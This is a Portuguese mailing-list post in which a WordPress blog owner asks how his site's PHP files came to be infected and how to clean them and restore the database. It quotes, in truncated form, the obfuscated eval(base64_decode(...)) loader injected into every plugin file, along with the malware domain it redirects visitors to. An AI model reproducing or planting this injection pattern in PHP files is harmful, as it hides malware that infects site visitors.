[Ubuntu-BR] só uso ubuntu e meu wordpress está com malware, pq?

[Paulo Horácio]

só uso o ubuntu para editar/manejar um blog com plataforma wordpress
hospedado em servidores da godaddy rodando linux; há um bom tempo que não
mando nenhum arquivo pra lá, mas de repente percebo que ao entrar no blog
uma página (nem sempre mas com frequencia) com domínio firesavez5.com é
acessada e um .exe com vírus é solicitado a ser baixado. Todo arquivo .php
está com um código que acredito ser o código malicioso (o código é enorme,
coloquei pontinhos pra resumir)

<?php /**/
eval(base64_decode("aWYoZnVuY3R...................TlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>


Minha dúvida é:
quais possibilidades existira deu ter infectado os arquivos do blog se só
uso ubuntu pra mexer nos arquivos e inclusive acessar o ftp?


Se alguém puder me dar uma dica também de como resolver isso agradeço. Até
agora eu fiz o upload de todos arquivos do wordpress (2.9.2) e restaurei o
tema original, todos eles estão sem o código acima, no entanto todos os .php
dos plugins contém o código e o problema persiste. Será que vou ter que
mexer no banco de dados? Essa é minha dúvida, tenho o WP Backup, plugin que
faz backup do BD, mas não sei como devo proceder para um backup e
restauração de banco de dados do mysql.